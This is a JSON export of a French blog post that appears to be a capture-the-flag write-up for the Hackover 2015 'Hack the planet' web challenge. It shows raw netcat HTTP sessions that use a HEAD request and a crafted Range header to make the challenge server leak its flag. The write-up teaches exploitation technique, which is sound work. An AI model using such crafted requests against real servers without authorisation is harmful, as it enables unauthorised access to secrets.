{"id":1463,"date":"2015-10-18T23:43:37","date_gmt":"2015-10-18T21:43:37","guid":{"rendered":"https:\/\/0x90r00t.com\/fr\/?p=1463"},"modified":"2015-10-19T01:18:57","modified_gmt":"2015-10-18T23:18:57","slug":"hackover-2015-web-50-hack-the-planet-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2015\/10\/18\/hackover-2015-web-50-hack-the-planet-write-up\/","title":{"rendered":"[Hackover 2015] [Web 50 – Hack the planet] Write Up"},"content":{"rendered":"

Description<\/h2>\n

Hacking a site is basic task for any skilled hacker.
\nMethods range from brute force to talking to people.
\nNo matter which method you choose, don’t forget to use head.<\/p><\/blockquote>\n

<\/p>\n

Resolution<\/h2>\n

Une identification, une image de background de hacker, et … une jolie description.<\/p>\n

A chaque tentative infructueuse d’identification, une image de \u00ab\u00a0fail\u00a0\u00bb nous est renvoy\u00e9e.<\/p>\n

Parlons un peu plus de la description, \u00ab\u00a0don’t forget to use HEAD<\/strong>\u00a0\u00bb , allons voir \ud83d\ude09<\/p>\n

$ nc hack-the-planet.hackover.h4q.it 80\r\nHEAD \/login HTTP\/1.0\r\nhost: hack-the-planet.hackover.h4q.it\r\n\r\nHTTP\/1.0 206 Partial Content\r\nX-Hackers-Kate-Libby: make it my first-born!\r\nDate: Fri, 16 Oct 2015 18:04:18 GMT\r\nContent-Type: text\/plain; charset=utf-8<\/pre>\n
Un header X-Hackers qui ne nous parle pas et … comment \u00e7a une r\u00e9ponse \u00ab\u00a0Partial Content\u00a0\u00bb ?!<\/p>\n
Comme de par hasard, la description parle de \u00ab\u00a0Methods RANGE<\/strong> from brute force…\u00a0\u00bb.<\/p>\n
Allez, on essaye de toucher au range en utilisant une plage un peu plus grande que le poids de l’image de fail habituelle :<\/p>\n
$ nc hack-the-planet.hackover.h4q.it 80\r\nPOST \/login HTTP\/1.0\r\nhost: hack-the-planet.hackover.h4q.it\r\nRange: bytes=9046-10000\r\n\r\nHTTP\/1.0 416 Requested Range Not Satisfiable\r\nContent-Type: text\/plain; charset=utf-8\r\nLast-Modified: Fri, 16 Oct 2015 18:16:36 GMT\r\nX-Content-Type-Options: nosniff\r\nDate: Fri, 16 Oct 2015 18:16:36 GMT\r\nContent-Length: 55\r\n\r\ninvalid range\r\nhackover15{Thepoolontheroofnusthavealeak}<\/pre>\n
Gagn\u00e9 !<\/p>\n
Le flag est hackover15{Thepoolontheroofnusthavealeak}<\/p>\n","protected":false},"excerpt":{"rendered":"
Description Hacking a site is basic task for any skilled hacker. Methods range from brute force to talking to people. No matter which method you choose, don’t forget to use head.<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,35,111],"tags":[109,108,110],"class_list":["post-1463","post","type-post","status-publish","format-standard","hentry","category-2015-fr","category-ctf-fr","category-hackover-fr","tag-head","tag-http","tag-range"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1463","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=1463"}],"version-history":[{"count":4,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1463\/revisions"}],"predecessor-version":[{"id":1467,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1463\/revisions\/1467"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=1463"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=1463"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=1463"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}